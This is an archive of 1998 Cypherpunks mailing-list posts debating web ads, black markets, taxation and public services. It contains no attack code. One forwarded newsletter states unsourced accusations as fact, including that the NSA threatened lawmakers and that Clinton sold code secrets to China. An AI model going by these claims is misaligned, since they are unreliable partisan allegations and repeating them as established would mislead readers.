From: "William H. Geiger III" <whgiii@gulf.net>
Date: Tue, 10 Nov 1998 02:26:00 +0800
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: Advertising Creepiness
In-Reply-To: <36471E6E.3E8E96D4@brainlink.com>
Message-ID: <199811091746.LAA05131@pompano.pcola.gulf.net>
MIME-Version: 1.0
Content-Type: text/plain



In <36471E6E.3E8E96D4@brainlink.com>, on 11/09/98 
   at 11:55 AM, Ray Arachelian <sunder@brainlink.com> said:

>Might be nice to have some sort of filter list for browsers that says "If
>GIF89 and (it's linked elsewhere, or to a CGI or at the top of the page)"
>don't show it.  I guess it's time to do some Mozilla source hacking...

Rather than hacking nutscrape you might want to run through a modified
proxy and have it filter all such garbage.

This stuff is not a problem as I only run textmode for http with no
java/javascript. If I can't navigate a website that way it is their loss.


-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 10 Nov 1998 01:30:47 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: Advertising Creepiness
In-Reply-To: <199811072128.NAA19724@netcom13.netcom.com>
Message-ID: <36471E6E.3E8E96D4@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> This is the new "blind spot"...that foveal region about a third of the way
> down a Web page screen that has dancing icons, "click on me" junk, and
> corporate logos. My guess is that nearly all of us skip this junk
> completely, and I think marketing studies will someday confirm this. (There
> have been tantalizing reports in places like the "Wall Street Journal" that
> basically almost nobody sees these ads, but the full message hasn't sunk
> in.)
> 
> And the advertising creeps are getting even creepier. Intel was running a
> banner ad that looked like a typical Mac or Windows error/alert box,
> something like "Click Here to Resume Operation." Creepy. And annoying.

Yep, I ignore them completely.  A few of those search here type things did
catch my attention.  My basic hatred of these isn't that they exist, but that
they're large, annoying, and animated.  Typically, soon as I see the page fully
load I hit ESC or the Stop icon to prevent these evil horrors from popping up.

A much more evil thing that I've seen when visiting pages of tripod or other
free web site members and now warehouse.com are actual Java Japplets or
JavaScripts that pop up another window with an advertisement.  Tripod or one of
those (I tend to try and forget the ads as hard as I can) has also taken to
putting a TV like lower right corner logo that hangs around, even when you
scroll the window -- what's really nasty about these fucking things is that
they scroll a bit with the window, then jump back to the bottom.

What's next?  In your face pop up Gif89 movies with AU/WAV sound tracks that
can't be dismissed until they play completely before you get to see the content
pages?

Some places (like Wired?) are annoying since they have a window that's 1/3
content with ads on top and on the side and bottom.  I'm trying to read the
fucking article, not trying to be distracted by the flashing, flickering eye
sores to the right and left. :(

Some of the really fucked up sites actually have porno ads with porn in them,
which makes them real welcome if I ever visit a page from my work.  I wouldn't
mind the pr0n if I was at home, but such things are frowned upon at work, and
fuck, I didn't even ask to see the shit... :(

Talk about feeping creatureism.  This is about as bad as flashing HTML was in
its inception.

Sure you can disable JavaScript, but if you do some sites won't work at all.
Ditto for Japplets.

Might be nice to have some sort of filter list for browsers that says "If GIF89
and (it's linked elsewhere, or to a CGI or at the top of the page)" don't show
it.  I guess it's time to do some Mozilla source hacking...


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 10 Nov 1998 03:02:35 +0800
To: Matthew James Gering <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone	 (fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B258@yarrowbay.chaffeyhomes.com>
Message-ID: <v04011703b26cb4447a3d@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:25 PM -0500 11/6/98, Matthew James Gering wrote:
>Matthew James Gering wrote:
>> >Provided you don't corrupt the meaning of free-market to include
>> >any possible black market, then yes, there will *always* be a
>> >black market. It can be made rather insignificant however.
>
>Petro responded:
>> Assuming your definition of "free market" is "a market without
>> regulation", you can't have a black market in a free market
>> since a black market is trade in violation of regulations.
>
>Like I said, if you don't corrupt the meaning of free market.
>Laissez Faire capitalism is based on a concept of individual rights.
>Therefore the proper role of any government (in a libertarian state) or
>individual/social institution (in rational anarchy) is to protect individual
>rights (life, liberty, property), and act as an objective framework for
>retributive force.
>Therefore, any transaction that violates individual rights is immoral (if
>not illegal) and constitutes a black market.
>e.g. assassinations, ransom, stolen goods, extortion, slavery, etc.
>To create a anarcho-capitalist definition of free market where everything
>goes and there is no concept of individual rights is as immoral and perverse
>as the statist concepts that similarly have no concept of individual rights
>(fascism, communism).

	Traditional usage of the term "black market" (at least in my
experience with the term) includes the markets for things often proscribed
(such as weapons, drugs, abortions) or marketed outside of the legally
mandated channels (food, clothing, liquor etc. purchased from non-approved
stores) or w/out government approved taxes being levied. Legal issues, not
moral ones. To try to discuss the markets in terms of "human rights", or to
expect the market to reflect ones own morality is ridiculous.

	Is slavery wrong? Would a Saudi Arabian, or a Kuwaitee (Kuwaition?)
agree? What about drugs, does their use violate your human rights
principle? Would someone from the South Side of Chicago, or Watts agree?

	The market itself is only concerned with legality, not morality.
Discussions of right and wrong do not take place at that point, and neither
do questions of "human rights".

	My point was that as you move towards the "ideal" of a free market,
there is less and less that one can call a "black market". True, things can
still be illegal--Slavery, drugs and the rest, and those things which

	Oh, and Extortion is already part of the market, it's called taxes.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 10 Nov 1998 04:08:00 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811062338.RAA00510@einstein.ssz.com>
Message-ID: <v04011707b26cda546a55@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:38 PM -0500 11/6/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Fri, 6 Nov 1998 12:34:34 -0500
>> From: Petro <petro@playboy.com>
>> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>>  	 (fwd)
>
>> 	Assuming your definition of "free market" is "a market without
>> regulation", you can't have a black market in a free market since a black
>> market is trade in violation of regulations.
>
>Actualy a black market is usualy goods gotten through theft or other illegal
>means, not necessarily anything related to how or what is sold. If you don't
>corrupt free-market to include legitimizing theft as a viable market
>strategy then yes, you can in fact have a black market in a free-market.

	Usualy != Correctly.

	Take tomatoes. Perfectly legal (AFAIK) everywhere, here in this
country a 5 year old child can buy a tomato from a farmer with a stand on
the side of the road.

	If you go back 10 years, and if "this country" was the soviet
union, a tomato purchased from the wrong person could get you in trouble.

	Entirely HOW the item was sold.

	This is true in this coutry. Licquor is legal if purchased thru the
approved store.

	Try selling the same thing out of the back of your truck.

	It is the product, or how the product is sold.

>Let's consider auto-theft. The issue isn't that you can't buy the car
>through legitimate means, it just means you have to have more resources than

	So take ampthetimines (well, don't take them, but take the case of
them), if I get them from Joe Random Drug Dealer, it's black Market, if I
get them from Paul the Doctor, it's "white" market.

	In fact, if I get them from Paul the Doctor, and then sell them to
someone else, I am selling them on the black market, even if I recieved
them legally, so in this case, it isn't how the item was aquired, it's
whether the _sale_, the *exchange* is legal.

>you have. So what do you do? You find somebody whose stolen a vehicle and is
>willing to sell it to you at a discount.
>
>> 	In other words, a Black market is when you trade either illegal
>> goods illegally, or legal goods illegally.
>Too strict and unrealistic a definition of black market.

	Not at all. It's quite wide open. It covers every non-legal
transaction.

>> 	If there are no illegal goods, and there is no regulations limiting
>> trading, then the black market cannot exist.
>Of course not since we've now legitimized theft and murder with your
>definition.

	I didn't think of theft when I wrote the above, and I don't usually
consider murder for hire markets as part of the black market, altho you
have a point.

	I still maintain that as one moves closer to a completely free
market, there is less and less of a black market, and to be the extrememe
case of a free market, there would be the potential to trade in both human
lives, and in stolen property.  In a free market, the selling of stolen
goods might not be a crime in and of itself, but the posession of those
things could be, and the aquireing would be, as well, the _hiring_ of an
assassin might be legal, as long as no killing took place. When it does,
you hang the assassin on murder, and the hirer on conspiracy, aiding and
abetting or whatever, and stick them in the same cell.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 10 Nov 1998 06:24:22 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <199811090631.AAA09682@einstein.ssz.com>
Message-ID: <199811092156.NAA13957@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



country have let it get out of control for many decades.
the idea that "someone else handles that stuff" has infected
our consciousness. govt is something WE handle if we want
a good one. if you want something done right, do it yourself.

cpunks actually contribute to this problem with their nihilistic
philosophy in general. the msg is that it is a waste of time
to engage in group activity or political discourse or lobbying
against the govt or organization or *whatever*... it's actually
just a variant on the sheeple passivity. sheeple are like, "that's
not my job". cpunks are like, "it is a waste of time and energy
to do that job". what's the difference in the end??

the govt can be turned around very, very quickly if the public
stops sucking down sixpacks and being hypnotized by meaningless
dribble of sporting events and sitcoms that parade endlessly
across their nanosecond attention span. maybe they might read
even more than a comic book or pornographic magazine some day.
the political class *intentionally* created this bread and
circus atmosphere and are hiding behind the scenes as we
speak. no dorothy do not look at the man behind the curtain.

some new books are encouraging signs. "secrecy" by moynihan. there
is a new book on the "third party" or something like that which
proposes a new political party, and is selling very well on
amazon. a new book by gerry spence lawyer talks about how the
u.s. population is enslaved. the material is there for those
who seek it. "when the student is ready the teacher will appear"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 10 Nov 1998 06:41:17 +0800
To: cypherpunks@cyberpass.net
Subject: IP: NSA Threatens To "OUT" Republicans Over Hubbell Investigation
Message-ID: <199811092205.OAA14797@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: softwar@us.net (CharlesSmith)
Subject: IP: NSA Threatens To "OUT" Republicans Over Hubbell Investigation
Date: Sun, 8 Nov 1998 16:53:35 -0500 (EST)
To: ignition-point@majordomo.pobox.com

President Clinton has tried to avoid the subject of encryption
exports to China while considering the release of Israeli
crypto-spy Jonathan Pollard.  Yet, encryption has played a large
role in a foreign donation scandal with one of Clinton's closest
associates, Webster Hubbell.

After losing at the polls, Republican insiders are grumbling
that they could not investigate Hubbell because the secret
National Security Agency (NSA) is threatening to retaliate
against hill members.

Webster Hubbell took money from Lippo in 1994.  Mr. Hubbell
served time in Federal prison because of his Whitewater
uncovered during Ken Starr's investigation.  

In 1993, Attorney General Janet Reno tasked Mr. Hubbell to
encryption under the CLIPPER encryption chip project.  Hubbell
had access to highly classified materials on encryption chip
design, including algorithms and software.  Hubbell met often in
the White House with now CIA Director George Tenet on the
CLIPPER project.

According to a Republican Capitol Hill staff member the "NSA
does not want Hubbell investigated."  The NSA has quietly
threatened to "out any congressional member like (Congressman)
Burton" who mentions Hubbell with encryption and China.

The NSA threat is not a hollow one because the agency is
certainly equipped with incriminating and/or embarrassing
personal information gathered from years of phone intercepts.
The NSA is the prime listening agency for national intelligence.

The NSA is equipped with satellites, super computers, employs an
estimated 25,000 and has a budget estimated to be one third of
the $26 billion U.S. intelligence budget each year.

John Huang, Ron Brown and Web Hubbell were deeply involved in
classified NSA encryption systems.  Specifically, John Huang,
Lippo banker, DNC fundraiser and secret-cleared Commerce
employee was briefed 37 times by the CIA on satellite encryption
technology.  According to the Commerce Department, Mr. Huang had
no encryption materials.

CLIPPER, according to secret Clinton documents, was to be
implemented by law whether it by "mandatory" legislation or a
"voluntary" system of taxpayer backed payments.  The CLIPPER
chip, according to a secret FBI document, also had an
"exploitable" feature allowing the U.S. government to monitor
communications.

The NSA CLIPPER chip was intended to provide all the banking and
financial security for the entire United States.  It was to be
required in every computer, fax and phone manufactured.

According to more secret FBI documents, CLIPPER also had one big
flaw.  A single penetration of the master key list would
compromise the entire system.

Ron Brown insisted that the Commerce Department be one of the
master CLIPPER key holders.  President Clinton tasked Brown to
the project in 1993 in a top-secret executive order.  According
to Nolinda Hill, Brown was aware that the encryption transfers
to China were bordering on treason.  

NASA administrator Benita Cooper wrote in 1993 that "compromise
of the NSA keys, such as in the Walker case, could compromise
the entire EES (CLIPPER) system."  Ms. Cooper at NASA knew
convicted spy John Walker sent tons of materials on U.S. secret
code systems to Russia for years during the Cold War.  One
breach of CLIPPER in a NASA computer could kill many and ruin
the agency.

In 1994 President Clinton began personally authorizing the
export of advanced, nuclear hardened, encryption technology
directly to communist China.  The exports took place with
presidential waivers that included the signature of Bill
Clinton.  They also took place using loopholes and bureaucratic
gray areas of U.S. export law.

The Clinton exports included such military items as advanced
fiber optic communications; radiation hardened encrypted
satellite control systems, encrypted radios and cellular phones,
and encrypted navigation systems.  According to the GAO,
President Clinton even approved the sale of a fully operational,
secure air traffic control system for the Chinese Air Force.

The failure of the NSA CLIPPER project is already a blot on the
secret agency based at Ft. Meade.  The possibility that Chinese
agents penetrated the NSA project would bring encryption to the
forefront of public debate and shine intense light on an inept
intelligence agency.

The seemingly crazy Clinton policy shows our President to be
crazy like a fox.  Clinton did what Pollard and Walker could not
do.  President Clinton sold national security secrets for cash
by writing his own legal waivers.  

Clinton's secret crypto policy served to line the pockets of
politicians and greedy corporate executives with red money.  The
Clinton export policy has significantly upgraded the nuclear
strategic and tactical firepower of the Chinese Army.  Clinton,
like Walker and Pollard, sold military code secrets for cash.

America knows more about AREA-51 and UFOs than Ft. Meade and
Webster Hubbell.  Bill Clinton and his China crypto-tale will
never be declassified for the American people.  The Clinton
scandal cover-up is backed by the NSA library of greatest
intercepts against Republicans.

================================================================

Information on CLIPPER, Ron Brown and Vince Foster - 

http://www.softwar.net/clip.html

================================================================
1 if by land, 2 if by sea.  Paul Revere - encryption 1775
Charles R. Smith
SOFTWAR         http://www.softwar.net      softwar@softwar.net
Pcyphered SIGNATURE:
93513049E31CC7BD371748D388E8EED0A73B5D3D90AF3349F8A40E5DE61B4ABD
3CAC50EF4BFE2CF287C9843E6E4676B2D9D710EB301CB0E05B5F52B2D1448A04
90B9E2F4C67594DF
===============================================================
SOFTWAR EMAIL NEWSLETTER                            11/08/1998
***  to unsubscribe reply with "unsubscribe" as subject    ***
================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 10 Nov 1998 06:33:25 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <199811092156.NAA13957@netcom13.netcom.com>
Message-ID: <199811092210.OAA15146@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




mail fwder seemed to have messed up my msg line here is a repost:




Jim: the govt is the way it is because the sheeple of this
country have let it get out of control for many decades.
the idea that "someone else handles that stuff" has infected
our consciousness. govt is something WE handle if we want
a good one. if you want something done right, do it yourself.

cpunks actually contribute to this problem with their nihilistic
philosophy in general. the msg is that it is a waste of time
to engage in group activity or political discourse or lobbying
against the govt or organization or *whatever*... it's actually
just a variant on the sheeple passivity. sheeple are like, "that's
not my job". cpunks are like, "it is a waste of time and energy
to do that job". what's the difference in the end??

the govt can be turned around very, very quickly if the public
stops sucking down sixpacks and being hypnotized by meaningless
dribble of sporting events and sitcoms that parade endlessly
across their nanosecond attention span. maybe they might read
even more than a comic book or pornographic magazine some day.
the political class *intentionally* created this bread and
circus atmosphere and are hiding behind the scenes as we
speak. no dorothy do not look at the man behind the curtain.

some new books are encouraging signs. "secrecy" by moynihan. there
is a new book on the "third party" or something like that which
proposes a new political party, and is selling very well on
amazon. a new book by gerry spence lawyer talks about how the
u.s. population is enslaved. the material is there for those
who seek it. "when the student is ready the teacher will appear"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 10 Nov 1998 07:22:56 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B269@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate wrote:
> What happens when you have somebody on a fixed or small income. 
> Is your position that the paultry sum they can raise will be 
> taken seriously in regards compensating either the insurance 
> company or the fire dept.?

What if they are on a fixed or small income and need food? Medical care?
Etc. Should be make food retail and medical services both tax-supported
government-mandated monopolies to accommodate those people who do not
produce enough that they need a free lunch provided by someone more
productive?

It is the same argument used to continue our massive failure of a public
educational system. 

There is no valid reason to intertwine "welfare" with the service, and there
are many reasons not to -- e.g. it treats items as commodity services that
should not be (esp. education), it creates false "rights" (e.g. right to
education), it creates a coercive monopoly immune to market competition, and
since people don't have to *evaluate* the service for spending decisions,
they tend to *value* it less if at all.

With welfare completely divorced from services, you can get a clear sight of
the real cost (negative value) of the socialistic support system, and also
of the productive output (positive value) of the service produced and those
willing and able to consume it.

> > willing to pay the local fire department a fee to stand 
> > ready to come and put out fires for me.
> 
> You do it already, it's called taxes.

No, he said *willing*.

> No, without taxes funding a civic police department with 

If you claim that a service won't exist without public tax funding, then you
are essentially claiming that people do not value that service enough to
privately pay for it. So we should instead force them to pay for it?

> connections to other police agencies around the country 
> you're hope of finding the perp is nil.

And these connections won't exist if they are private entities?

Perhaps they will have less chance if the agencies are bound to the same
limitations as individuals in regards to privacy and liberty, but that is a
good thing.

> Oh, yeah. You and a couple of your beer buddies have like a 
> real hope in hell of matching the capabilities of a real 
> police homicide or rape investigation. Get fucking real.

But that is not to say a private organization would not have matching
capabilities. You cannot look at current PI's for the same reason as you
cannot look at private education as what would exist in absence of the
publicly mandated one. Lack of suitable competition is due to
government-created monopolistic conditions.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 10 Nov 1998 05:56:41 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811081809.MAA05525@einstein.ssz.com>
Message-ID: <v04011709b26cfc756e2d@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:09 PM -0500 11/8/98, Jim Choate wrote:
>Just face it. It isn't the threat of violence that pisses you off. It's that
>you have social responsibilities to those around you. Taxes represent a
>responsibility that you don't want and to hell with the consequences.

	No, it's that facists & socialists like yourself think we should be
happy letting you decide what our social responsibilities are.

	I am perfectly willing to pay for a police force. A police force
that arrests ALLEGED rapists, treats them like human beings until found
guilty and then deals with them as the law indicates. I am NOT willing to
pay for a police force that spends most of it's time (well, aside from
eating doughnuts, drinking coffee and collecting bribes) chasing after
teenagers with illegal chemicals. I am not willing to pay for a police
force that extorts money from these same teenagers. I am not willing to pay
money for a police force that thinks it needs to arrest people for
"loitering", "Mob Action", when it's defined as more than 4 people standing
together in a public place, and ESPECIALLY when EVERY TIME THEY ARREST
SOMEONE, IT'S THROWN OUT OF COURT.

	I am willing to pay for the streets I use. I am not willing to pay
the same fees to ride my bicycle (my current primary form of
transportation) as you do to drive your 2 ton SUV.

	I am willing to pay for fire protection. I am not willing to pay
for "universal health care", "welfare", and other such nonsense.

	In other words Jim, Fuck You. I, and I'd bet most people here,
including Mr. May, are perfectly willing, and hell even eager to pay their
share, to assume their social responcibility, they just get very, very
angry at having to pay OTHER peoples social responcibility, and get very,
very angry at having to pay for other shit (Senate Luncheons and Swimming
Pools, the Militaries greatly inflated budget, all the waste that is todays
federal government).

	They get even angrier when some putz like you comes along and tries
to tell them what their social responcibility is.

>> anyone else from telling it to fuck off?  Such a state cannot govern
>> those who do not wish to be governed, and so would not be a government.
>
>No state can govern those who don't wish to be governed, violence or no.

	Yes, but a state can kill those who don't wish to be governed. Can
and does routinely.

>[I've deleted a great gob of this since it's the same just rehashed in
>different sentences.]

	But did you bother to read them this time?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Tue, 10 Nov 1998 07:05:47 +0800
To: Petro <petro@playboy.com>
Subject: black markets and color of law (was privacy fetish)
In-Reply-To: <v04011707b26cda546a55@[206.189.103.230]>
Message-ID: <Pine.SOL.3.91.981109151519.19403B-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Nov 1998, Petro wrote:

> 
> 	If you go back 10 years, and if "this country" was the soviet
> union, a tomato purchased from the wrong person could get you in trouble.
> 
> 	Entirely HOW the item was sold.
> 
> 	This is true in this coutry. Licquor is legal if purchased thru the
> approved store.
> 
> 	Try selling the same thing out of the back of your truck.
> 
> 	It is the product, or how the product is sold.
> 

Why is this so hard to fathom.  Black markets are simply markets
that are not approved of by the reigning force monopoly.

That could also be read as illegal, however, there are many
goods in the united states that are only illegal by color
of law, not in actual fact.

Of course the fact that the regulations are only under color
of law won't stop you from spending time in the cooler if you're
caught.

Most of these laws have to do with assigning law making to
bureacrats.

Are there any legal historians out there that have researched
the nature of bureaucracies like the FDA, DEA and BATF and the
lattitude that congress has given them in declaring various
good illegal?  How much power could congress hand over to
a department before the law giving them the power could
be declared unconstitutional?

For example, a constitutional amendment was necessary to
make alcohol illegal.  Why was this necessary?  Why
was it not necessary to do the same for every other
substance?  And if not for every other substance, then
for substances in general?

"Congress shall have the power to declare intrastate trade in
various products illegal."

It would be very simple.  It would be *the* prohibition act.
It would cover everything from encryption, to newpapers,
to alcohol and other drugs.

What is the basis for bureaucratic power and has it ever
been formally challenged in the supreme court?

My guess is that this power has not been seriously challenged
since Roosevelt stacked the Supreme Court and they decided
that the the welfare clause was a broad grant of power to
the federal government.

If I remember correctly, a closely related decision by
the Supreme stated that the commerce clause did not allow
the banning of weapons from "school zones" because even
though having weapons in school zones might effect commerce
it would effect to such a small degree that the commerce clause 
didn't reach that far.  The supreme court said they didn't know
how far it did reach.

It would be interesting to push the supreme to rule on the
welfare clause.  Could it reach far enough to ban nicotine?
Could it reach far enough to grab the fatty mc'ds hamburger
out of your hand?  Could it tell you what sports are
too dangerous?  What about skiing?  Car driving?  Parachuting?
Scuba diving?

I'm beginning to look forward to Y2K.

jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 10 Nov 1998 08:30:48 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: NSA Threatens To "OUT" Republicans Over Hubbell Investigation
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B26A@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Uh, what in the hell is "advanced, nuclear hardened, encryption technology"
?

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Tue, 10 Nov 1998 08:42:05 +0800
To: "'Cypherpunks Distributed Remailer'" <cypherpunks@einstein.ssz.com>
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <000b01be0c0f$19720c60$9d2580d0@ibm>
Message-ID: <000301be0c3f$74141a20$618195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



You know, guys, it doesn't matter what sort of tax system is set up, if it
doesn't begin with one very fundamentally, essential, crucial, important point:
respect for the sovereignty of the individual.   This means respect for their
individual agreement, their informed consent, to any arrangement to be taken up
by them.

If, at any point in time - either before, during, or after a plan for obtaining
moneys from citizen-units is instigated - it loses sight of the purpose for
setting up the whole thing, then it's worthless anyway.  If it doesn't support
the highest ideal of humanity - unit by unit, individual by individual, human
beings qua their separate existence  - then it is not serving their purposes,
but only the purpose of those who identify themselves as the State: employees of
the State, leaders of the State, keepers of the State, goalies of the State,
wards of the State, etc.

If "members" are not extended the courtesy due to strangers, where one would
normally inquire - "would you like to join us?" or "would you like to combine
efforts with us in this endeavor to do ourselves a good" or "would you agree to
support this organization in this manner?"; if instead their existence is taken
for granted and their efforts treated as minor elements in the larger scheme of
more important things, if their separate opinions are rolled up into a combined
average, then what does it matter the benefits?   What does it matter, the
details?

If there is no basic comprehension of respect, no display of respect, no
provision in their Codes (legal codes, tax codes, etc.) for the methods of
respectfulness -  then where is the goodness in the rest of it, once you've lost
your place in your hierarchy of values?   People will then be operating in an
mindless atmosphere of unconsciousness, an atmosphere lacking an appreciation
for oneself as a unique creature, self-possessed and having their own reasons
and purpose for living.   Gradually they will lose the consciousness of
themselves as being something other than a "member" of a collective, an identity
not dependent upon recognition from the State, upon sanction from The Crowd for
permission to move based on the independent exercise of judgement- be it to move
about freely, or consume the  chemicals of the Universe, or think unofficial
thoughts, whatever.

They could become like the "bird in a guilded cage" - having all the benefits of
personal comfort, but without the ability or permission to pursue goals beyond
what is tolerated within the boundaries of the Group Consciousness (can you say
B-o-r-g), so that they may have more and more of the basic physical
requirements, but less and less of themselves - of their own authority, of their
own self-esteem, an esteem not pre-measured or pre-determined by the PC police,
that constant reference in the back of their mind reminding them of the limits
of their approved parameters.

Nothing - no plan, no organization, no purpose, no method, no clever, cheaper,
faster, more practical scheme - is worth supporting, if it degrades the concept,
the idea, the reality, of respect for the boundaries of our separate existence.
If it denies the recognition of self-ownership, if it ignores it, if it fails to
account for it in word or deal with it in action, then eventually it will
transgress these boundaries with impunity and an air of overbearing
self-righteousness, and you will lose what is most important of all.    You
could "gain the world" (of tax-extorted benefits), but lose your Self.    (of
course some people don't propose to have one, and so wouldn't miss it or
complain over its absence)


   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 10 Nov 1998 08:41:36 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Grounding (last slice of spam?)
Message-ID: <364786A4.3CC1@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Mixmaster-san,

Sorry for prolonging the agony - I was hoping, in vain, for an admission
of guilt.

>
> The fundamental misconception that started this whole sad comedy
> of Doltish errors was Jim Dolt's belief that a Faraday cage has 
> to be grounded in order to suppress electromagnetic radiation.
>
Diagnosis:
Lion taming is contraindicated, a career of public service is
recommended.

And this...
> Now the electrons repel each other and therefor move in a
> circular motion with the spark gap as the center.
> ^^^^^^^^^^^^^^^
takes me on a trip with Mr. Peabody and Sherman to the place where the
Huskies go...

Was my question about cycling the keys for a block cipher a *useless*
one or did the bit about horses offend? Horses are OK, sort of. In their
own way. On someone else's nickel.

Mike

Snowcone, anyone?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Tue, 10 Nov 1998 09:17:36 +0800
To: "'Cypherpunks Distributed Remailer'" <cypherpunks@einstein.ssz.com>
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <199811092210.OAA15146@netcom13.netcom.com>
Message-ID: <000401be0c44$50a73f40$618195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Vlad Ze Prophet:

:sheeple are like, "that's
: not my job". cpunks are like, "it is a waste of time and energy
: to do that job". what's the difference in the end??
:
: the govt can be turned around very, very quickly if the public
: stops sucking down sixpacks and being hypnotized by meaningless
: dribble of sporting events and sitcoms that parade endlessly
: across their nanosecond attention span.  [. . .]
........................................................


Sheeple are like, "that's not my job".
and cpunks are like, "YOU're not my job".

And to the govmt-as-is cpunks are like, "get off my space and out of my face".

And if I, non-exemplary Citizen of the Galaxy, choose to sit around guzzling
down sixpacks, listening to the dribble of sporting events and sitcoms (can you
see it!),  and you personally don't like it, I would say " I'M like, so not your
job".

I would like to know what exactly you've done for me lately, Vladimeer, for to
turn the government around.


   ..
Blanc - like, sitting around hypnotized, urp, waiting for visionary inspiration.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
